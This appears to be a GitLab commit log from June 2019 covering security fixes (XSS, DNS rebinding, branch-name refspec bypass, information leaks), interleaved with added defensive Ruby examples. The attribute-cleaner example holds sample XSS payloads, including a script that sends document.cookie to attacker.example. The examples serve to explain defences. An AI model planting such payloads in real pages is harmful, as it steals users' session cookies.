path: root/spec
Commit message | Author | Age | Files | Lines
* Introduce sidekiq worker for auto merge process  [introduce-auto-merge-process-worker]
  Author: Shinya Maeda  Age: 2019-06-04  Files: 3  Lines: -27/+65

  As we have a central domain for auto merge process today, we should use a single worker for any auto merge process.
* Merge branch 'sh-fix-import-url-update' into 'master'
  Author: Thong Kuah  Age: 2019-06-03  Files: 1  Lines: -0/+12

  Fix project settings not being able to update
  Closes #62708
  See merge request gitlab-org/gitlab-ce!29097

  * Fix project settings not being able to update
    Author: Stan Hu  Age: 2019-06-03  Files: 1  Lines: -0/+12

    Previously import_url would always be present in the update parameters, which would cause the validation to fail. We now only include this parameter if a URL is given.
    Closes https://gitlab.com/gitlab-org/gitlab-ce/issues/62708
* Comply with `no-implicit-coercion` rule (CE)
  Author: Nathan Friend  Age: 2019-06-03  Files: 3  Lines: -3/+7

  This commit is the result of running `yarn eslint --fix` after enabling the `no-implicit-coercion` ESLint rule. This rule has been added to our ESLint config here: https://gitlab.com/gitlab-org/gitlab-eslint-config/merge_requests/14

* Backporting EE fix
  Author: rossfuhrman  Age: 2019-06-03  Files: 1  Lines: -36/+38

* Move boardsStore.moving to BoardList component
  Author: Winnie Hellmann  Age: 2019-06-03  Files: 1  Lines: -0/+12

* Merge branch 'master' of dev.gitlab.org:gitlab/gitlabhq
  Author: Robert Speicher  Age: 2019-06-03  Files: 5  Lines: -2/+72
  * Merge branch 'security-60143-address-xss-issue-master' into 'master'
    Author: Robert Speicher  Age: 2019-06-03  Files: 1  Lines: -0/+42

    Reject slug+uri concat if slug is deemed unsafe
    See merge request gitlab/gitlabhq!3108

    * Reject slug+uri concat if slug is deemed unsafe
      Author: Kerri Miller  Age: 2019-05-24  Files: 1  Lines: -0/+42

      First reported: https://gitlab.com/gitlab-org/gitlab-ce/issues/60143

      When the page slug is "javascript:" and we attempt to link to a relative path (using `.` or `..`) the code will concatenate the slug and the uri. This MR adds a guard to that concat step that will return `nil` if the incoming slug matches against any of the "unsafe" slug regexes; currently this is only for the slug "javascript:" but can be extended if needed.

      Manually tested against a non-exhaustive list from OWASP of common javascript XSS exploits that have to do with mangling the "javascript:" method, and all are caught by this change or by existing code that ingests the user-specified slug.
  * Merge branch 'security-58856-persistent-xss-in-note-objects' into 'master'
    Author: Robert Speicher  Age: 2019-06-03  Files: 4  Lines: -2/+30

    Persistent XSS in note objects CE
    See merge request gitlab/gitlabhq!3075

    * Remove unused fixture lines
      Author: Tiger  Age: 2019-05-28  Files: 1  Lines: -2/+0

    * Add `html` to sensitive words
      Author: charlieablett  Age: 2019-05-01  Files: 2  Lines: -2/+3

    * Remove accidental regressions
      Author: charlieablett  Age: 2019-04-30  Files: 1  Lines: -5/+6

    * Ensure Issue & MR note_html cannot be imported
      Author: Ash McKenzie  Age: 2019-04-30  Files: 2  Lines: -16/+16

    * Add disallowed fields to AttributeCleaner
      Author: charlieablett  Age: 2019-04-24  Files: 2  Lines: -10/+8

    * Re-stub stubbed method calls
      Author: charlieablett  Age: 2019-04-23  Files: 1  Lines: -3/+9

    * Exclude fields from note import
      Author: charlieablett  Age: 2019-04-23  Files: 2  Lines: -2/+26
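The persistent XSS fix above hinges on one idea: an import file must never be allowed to write the cached `*_html` columns (or other fields the importer is supposed to own), because those columns are trusted as already sanitized when rendered. The following is an added illustration of that attribute-cleaning step, not GitLab's AttributeCleaner; the prohibited patterns, the allow-list of references, and the sample issue record are assumptions made for this example.

```ruby
# Added example modelled on the AttributeCleaner / note_html entries above.
# Not GitLab's code: the patterns, the allow-list and the sample record are
# assumptions made for this illustration.

# Keys that an import payload must never be allowed to set directly:
#   *_html          cached, already-sanitized markdown renderings (trusted on read)
#   *_id / *_ids    foreign keys, which the importer must remap rather than trust
#   *attributes*    nested-attributes writers that would bypass the cleaner
PROHIBITED_PATTERNS = [/_html\z/, /_id\z/, /_ids\z/, /attributes/].freeze

# References the importer remaps itself and therefore keeps in the payload.
# Hypothetical allow-list for this example.
ALLOWED_REFERENCES = %w[author_id project_id].freeze

# Drop prohibited keys from one record's attribute hash.
def clean_attributes(attrs, allowed: ALLOWED_REFERENCES)
  attrs.reject do |key, _value|
    name = key.to_s
    next false if allowed.include?(name)
    PROHIBITED_PATTERNS.any? { |pattern| name.match?(pattern) }
  end
end

# Walk a nested export tree (issue -> notes -> ...) so that a note_html
# buried inside an array of child records is removed as well.
def clean_tree(value, allowed: ALLOWED_REFERENCES)
  case value
  when Hash
    clean_attributes(value, allowed: allowed)
      .transform_values { |v| clean_tree(v, allowed: allowed) }
  when Array
    value.map { |v| clean_tree(v, allowed: allowed) }
  else
    value
  end
end

# Constructed sample of what a hostile export file might contain.
SAMPLE_ISSUE = {
  'title' => 'Login fails',
  'description' => 'See **logs**',
  'description_html' => '<img src=x onerror=alert(document.cookie)>',
  'author_id' => 7,
  'milestone_id' => 42,
  'notes' => [
    {
      'note' => 'Reproduced',
      'note_html' => '<script>fetch("https://attacker.example/" + document.cookie)</script>',
      'author_id' => 9,
      'award_emoji_attributes' => [{ 'name' => 'thumbsup' }]
    }
  ]
}.freeze

if __FILE__ == $PROGRAM_NAME
  require 'pp'
  pp clean_tree(SAMPLE_ISSUE)
end
```

Cleaning the whole tree, rather than only the top-level record, is the point of the "Exclude fields from note import" commit: a note nested under an issue carries its own `note_html`, and a cleaner that only looks at the issue's keys would let it through.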
* Merge branch 'osw-sync-merge-ref-upon-mergeability-check' into 'master'
  Author: Douwe Maan  Age: 2019-06-03  Files: 5  Lines: -141/+251

  Automatically update MR merge-ref along merge status
  Closes #58495
  See merge request gitlab-org/gitlab-ce!28513

  * Add payload to the service response
    Author: Oswaldo Ferreira  Age: 2019-05-31  Files: 2  Lines: -0/+111

    This introduces payload to the ServiceResponse with the merge ref HEAD commit data

  * Automatically update MR merge-ref along merge status
    Author: Oswaldo Ferreira  Age: 2019-05-31  Files: 4  Lines: -141/+140

    This couples the code that transitions the `MergeRequest#merge_status` and refs/merge-requests/:iid/merge ref update. In general, instead of directly telling `MergeToRefService` to update the merge ref, we should rely on `MergeabilityCheckService` to keep both the merge status and merge ref synced.

    Now, if the merge_status is `can_be_merged` it means the merge-ref is also updated to the latest. We've also updated the logic to be more systematic and less user-based.
* Merge branch '58269-separate-update-patch' into 'master'
  Author: Mike Greiling  Age: 2019-06-03  Files: 3  Lines: -60/+180

  Do not display Update app button when saving Knative domain name
  Closes #58269
  See merge request gitlab-org/gitlab-ce!28904

  * Add updateSuccessful/Failed props to knative app
    Author: Enrique Alcantara  Age: 2019-05-30  Files: 1  Lines: -0/+2

    They are used to indicate when knative domain name has changed

  * Extract knative domain editor into a component
    Author: Enrique Alcantara  Age: 2019-05-30  Files: 2  Lines: -60/+178

    The new component also implements several improvements in the knative domain editor workflow:
    - Display a loading spinner when saving changes in the domain name
    - Display success toast message indicating changes were saved successfully.
    - Display error message if the contrary occurs
* Cleans up UpdateProjectStatistics concern
  Author: Mayra Cabrera  Age: 2019-06-03  Files: 2  Lines: -10/+11

  - Renames attributes from stat to project_statistiscs_name and attribute to statistic_attribute
  - Reorders methods on UpdateProjectStatistics concern
  - Removes unused module from Ci::Build
* Merge branch 'issafeurl-utility' into 'master'
  Author: Kushal Pandya  Age: 2019-06-03  Files: 1  Lines: -0/+84

  Add global isSafeURL utility
  See merge request gitlab-org/gitlab-ce!28943

  * Add global isSafeURL utility  [issafeurl-utility]
    Author: Paul Gascou-Vaillancourt  Age: 2019-06-03  Files: 1  Lines: -0/+84

    - Added isSafeURL utility based on prior work in gitlab-ee
    - Also added isAbsoluteOrRootRelative() and getBaseURL() utils, needed by isSafeURL
    - Removed URL() fallback because URL() is now polyfilled
    - Updated specs
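Two entries in this log deal with the same class of bug from different ends: the wiki slug guard ("Reject slug+uri concat if slug is deemed unsafe") refuses to build a link when the user-controlled slug is a `javascript:` scheme, and the isSafeURL utility accepts a URL only when it is absolute or root-relative and resolves to http(s). The block below is an added Ruby illustration of both checks, not the project's own code (the original isSafeURL is frontend JavaScript); the method names, the base URL, the set of rejected schemes, and the decision to also reject protocol-relative `//host` links are assumptions made for this example.

```ruby
# Added example, not GitLab's code. Models the wiki slug guard and an
# isSafeURL-style predicate from the log entries above; names, base URL and
# rejected-scheme list are assumptions for this illustration.
require 'uri'

# Browsers ignore ASCII control characters (tab, newline, ...) inside a URL
# scheme, so "java\tscript:" still runs as javascript:. Normalise the same way
# before matching, and drop ordinary whitespace too, to stay conservative.
def normalize_scheme_tricks(str)
  str.gsub(/[\u0000-\u0020\u007f]/, '')
end

# The log's guard matched only "javascript:"; this version also rejects the
# other scripting/data schemes, case-insensitively.
def unsafe_slug?(slug)
  normalize_scheme_tricks(slug).match?(/\A(?:javascript|vbscript|data):/i)
end

# "slug" + "./relative" would otherwise become "javascript:/./relative".
# Returns nil instead of a link when the slug is unsafe.
def join_slug_and_uri(slug, relative_uri)
  return nil if unsafe_slug?(slug)
  "#{slug}/#{relative_uri}"
end

SAFE_SCHEMES = %w[http https].freeze

# Absolute (has a scheme) or root-relative ("/path") input is resolved against
# the site's base URL, then only http(s) results are accepted. Protocol-relative
# "//host" is rejected here as well, which is stricter than a pure scheme check.
def safe_url?(url, base_url: 'https://gitlab.example')
  return false if url.nil?
  return false if url.match?(/[\u0000-\u001f\u007f]/) # embedded controls are never legitimate

  str = url.strip
  absolute = str.match?(%r{\A[a-z][a-z0-9+.-]*:}i)
  root_relative = str.start_with?('/') && !str.start_with?('//')
  return false unless absolute || root_relative

  SAFE_SCHEMES.include?(URI.join(base_url, str).scheme.to_s.downcase)
rescue URI::InvalidURIError
  false
end
```

Note the order of operations in `safe_url?`: the control-character check runs before `strip`, because `strip` would hide a leading tab that a browser also ignores, and `URI.join` resolves the string before the scheme is inspected so that a root-relative path inherits the site's own scheme rather than being trusted on its shape alone.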
* Move NoteApp tests to Jest
  Author: Winnie Hellmann  Age: 2019-06-03  Files: 2  Lines: -106/+103

* Merge dev.gitlab.org master into GitLab.com master
  Author: Yorick Peterse  Age: 2019-06-03  Files: 41  Lines: -128/+883
  * Merge branch 'security-jej/prevent-web-sign-in-bypass' into 'master'
    Author: GitLab Release Tools Bot  Age: 2019-06-03  Files: 1  Lines: -1/+33

    Prevent password sign in restriction bypass
    See merge request gitlab/gitlabhq!2702

    * Prevent password sign in restriction bypass
      Author: James Edwards-Jones  Age: 2019-05-21  Files: 1  Lines: -1/+33

  * Merge branch 'security-fix_milestones_search_api_leak' into 'master'
    Author: GitLab Release Tools Bot  Age: 2019-06-03  Files: 3  Lines: -4/+83

    Resolve: Milestones leaked via search API
    Closes #2822
    See merge request gitlab/gitlabhq!2997

    * Resolve: Milestones leaked via search API
      Author: Felipe Artur  Age: 2019-05-20  Files: 3  Lines: -4/+83

      Fix milestone titles being leaked using search API when users cannot read milestones
  * Merge branch 'security-60039' into 'master'
    Author: GitLab Release Tools Bot  Age: 2019-06-03  Files: 5  Lines: -31/+106

    Disallow invalid MR branch name
    See merge request gitlab/gitlabhq!3052

    * Refactor spec to not use truthy or falsey
      Author: Mark Chao  Age: 2019-05-03  Files: 1  Lines: -58/+58

    * Use full ref when creating MR pipeline in specs
      Author: Mark Chao  Age: 2019-05-03  Files: 1  Lines: -3/+3

      Continuation of 426488b7218e85ce69868ae4628801af2322b74a

    * Validate MR branch names
      Author: Mark Chao  Age: 2019-05-03  Files: 4  Lines: -28/+103

      Prevents refspec as branch name, which would bypass branch protection when used in conjunction with rebase.

      HEAD seems to be a special case with lots of occurrence, so it is considered valid for now.

      Another special case is `refs/head/*`, which can be imported.
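The commit above states the problem (a refspec such as `+src:dst` accepted where a branch name is expected names a different target ref than the one protection rules were evaluated for) but not the rule set. The following is an added illustration of such a validator, not GitLab's code: the `HEAD` exception and the "only when importing" allowance for `refs/heads/*` follow the commit message, while the refspec heuristics and the subset of `git check-ref-format` rules are assumptions made for this example.

```ruby
# Added example, not GitLab's validator. The rule set, the treatment of HEAD
# and the importing-only exception for refs/heads/* are assumptions made for
# this illustration.

# Anything git would read as a refspec (or a fully qualified ref) rather than
# as a plain branch name.
def refspec_like?(name)
  name.include?(':') || name.start_with?('+') || name.start_with?('refs/')
end

# Subset of git-check-ref-format(1) that can be enforced without shelling out.
def git_ref_format_ok?(name)
  return false if name.nil? || name.empty? || name == '@'
  return false if name.start_with?('-', '/') || name.end_with?('/', '.')
  return false if name.include?('..') || name.include?('@{') || name.include?('//')
  # ASCII control characters, space, and git's reserved punctuation.
  return false if name.match?(/[\x00-\x1f\x7f ~^:?*\[\\]/)

  name.split('/').none? { |part| part.start_with?('.') || part.end_with?('.lock') }
end

# Branch names coming from a merge request form or API call. During import a
# fully qualified refs/heads/<branch> is tolerated, but the branch part still
# has to be a well-formed ref.
def valid_branch_name?(name, importing: false)
  return false if name.nil?
  return true if name == 'HEAD'
  if importing && name.start_with?('refs/heads/')
    return git_ref_format_ok?(name.delete_prefix('refs/heads/'))
  end

  !refspec_like?(name) && git_ref_format_ok?(name)
end

if __FILE__ == $PROGRAM_NAME
  ['feature/login-fix', '+refs/heads/feature:refs/heads/master', 'refs/heads/x', 'HEAD'].each do |n|
    puts format('%-40s %s', n, valid_branch_name?(n))
  end
end
```

The refspec test is deliberately run before the format check: `git check-ref-format` would already reject the `:` and the `+`, but keeping the two concerns separate makes it obvious which input class the protection-bypass fix is targeting.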
  * Merge branch 'security-id-leaked-password-in-import-url-frontend' into 'master'
    Author: GitLab Release Tools Bot  Age: 2019-06-03  Files: 4  Lines: -2/+105

    Handling password on import by url page
    See merge request gitlab/gitlabhq!3061

    * Handling password on import by url page
      Author: Sam Bigelow  Age: 2019-05-29  Files: 1  Lines: -2/+12

    * Hide password on import by url form
      Author: Igor Drozdov  Age: 2019-05-29  Files: 3  Lines: -0/+93
  * Merge branch 'dm-http-hostname-override' into 'master'
    Author: GitLab Release Tools Bot  Age: 2019-06-03  Files: 25  Lines: -66/+405

    Protect Gitlab::HTTP against DNS rebinding attack
    See merge request gitlab/gitlabhq!3071

    * Add DNS rebinding protection settings
      Author: Oswaldo Ferreira  Age: 2019-05-30  Files: 4  Lines: -1/+101

    * Protect Gitlab::HTTP against DNS rebinding attack
      Author: Douwe Maan  Age: 2019-05-30  Files: 23  Lines: -65/+304

      Gitlab::HTTP now resolves the hostname only once, verifies the IP is not blocked, and then uses the same IP to perform the actual request, while passing the original hostname in the `Host` header and SSL SNI field.
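The commit message describes the whole defence in one sentence: without it, the IP checked against the block list and the IP the socket actually connects to come from two separate DNS lookups, and an attacker-controlled zone can answer the first with a public address and the second with 127.0.0.1 or the cloud metadata address. The block below is an added Ruby illustration of the resolve-once-then-pin pattern, not GitLab's `Gitlab::HTTP`; the blocked ranges are an assumed policy, the resolver is injectable so the example runs offline, and the pinning relies on `Net::HTTP#ipaddr=` from Ruby 2.5 or later, which connects to the given IP while `#address` (the hostname) continues to supply the `Host` header and the SNI name.

```ruby
# Added example of resolve-once-then-pin, not GitLab's Gitlab::HTTP.
# Blocked ranges are an assumed policy; Ruby 2.5+ is assumed for Net::HTTP#ipaddr=.
require 'ipaddr'
require 'resolv'
require 'net/http'
require 'uri'

# Address ranges an outbound request must never reach (assumed policy).
BLOCKED_RANGES = %w[
  0.0.0.0/8 10.0.0.0/8 127.0.0.0/8 169.254.0.0/16 172.16.0.0/12
  192.168.0.0/16 ::1/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }.freeze

class BlockedAddressError < StandardError; end

def blocked_ip?(ip)
  addr = IPAddr.new(ip)
  addr = addr.native if addr.ipv4_mapped? # ::ffff:127.0.0.1 is still loopback
  BLOCKED_RANGES.any? { |range| range.include?(addr) }
end

# Resolve exactly once and vet every returned address. The resolver is
# injectable so the example can run offline; Resolv.getaddresses is the default.
def resolve_and_check(hostname, resolver: Resolv.method(:getaddresses))
  ips = begin
    [IPAddr.new(hostname).to_s] # literal IP: no lookup, but still vetted
  rescue IPAddr::InvalidAddressError
    resolver.call(hostname)
  end
  raise BlockedAddressError, "#{hostname} did not resolve" if ips.empty?

  # All answers must pass: a hostile zone can mix a public and a private
  # address in one response and let the client pick.
  bad = ips.find { |ip| blocked_ip?(ip) }
  raise BlockedAddressError, "#{hostname} resolves to blocked address #{bad}" if bad

  ips.first
end

# Build the client against the vetted IP. Net::HTTP#ipaddr= makes the TCP
# connection go to that IP, while #address stays the hostname, which is what
# ends up in the Host header and in the TLS SNI extension.
def pinned_http(uri, resolver: Resolv.method(:getaddresses))
  ip = resolve_and_check(uri.hostname, resolver: resolver)
  http = Net::HTTP.new(uri.hostname, uri.port)
  http.ipaddr = ip
  http.use_ssl = (uri.scheme == 'https')
  http.open_timeout = 5
  http.read_timeout = 10
  http
end
```

A caller would then run `http.start { |h| h.request(Net::HTTP::Get.new(uri)) }`. Two caveats the pattern does not cover by itself: every redirect target is a new hostname and must go through `pinned_http` again, and if a forward proxy is configured the pinned IP is not what the proxy will resolve, so the check has to be applied at the proxy instead.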
  * Merge branch 'security-fix-project-existence-disclosure-master' into 'master'
    Author: GitLab Release Tools Bot  Age: 2019-06-03  Files: 1  Lines: -14/+18

    Fix url redaction for issue links
    See merge request gitlab/gitlabhq!3091

    * Fix url redaction for issue links
      Author: Patrick Derichs  Age: 2019-05-03  Files: 1  Lines: -14/+18

      Add changelog entry
      Add missing href to all redactor specs and removed href assignment
      Remove obsolete spec
      If original_content is given, it should be used for link content

  * Merge branch 'security-unsubscribing-from-issue' into 'master'
    Author: GitLab Release Tools Bot  Age: 2019-06-03  Files: 1  Lines: -10/+99

    Hide issue title on unsubscribe for anonymous users
    See merge request gitlab/gitlabhq!3097

    * Hide issue title on unsubscribe for anonymous users
      Author: Alexandru Croitor  Age: 2019-05-16  Files: 1  Lines: -10/+99

  * Merge branch 'security-fix-confidential-issue-label-visibility-master' into 'master'
    Author: GitLab Release Tools Bot  Age: 2019-06-03  Files: 1  Lines: -0/+34

    Fix confidential issue label disclosure on milestone view
    See merge request gitlab/gitlabhq!3098

    * Fix confidential issue label disclosure on milestone view
      Author: Patrick Derichs  Age: 2019-05-14  Files: 1  Lines: -0/+34

      Add changelog entry
      Method should be public
      Use milestonish method
      Use render data to filter labels
      Add specs for label visibility on milestone

* Merge branch 'ac-graphql-stats' into 'master'
  Author: Dmitriy Zaporozhets  Age: 2019-06-03  Files: 10  Lines: -5/+256

  Add Namespace and ProjectStatistics to GraphQL API
  See merge request gitlab-org/gitlab-ce!28277

  * Add Namespace and ProjectStatistics to GraphQL API
    Author: Alessio Caiazza  Age: 2019-06-03  Files: 10  Lines: -5/+256

    We can query namespaces, and nested projects. Projects now expose statistics.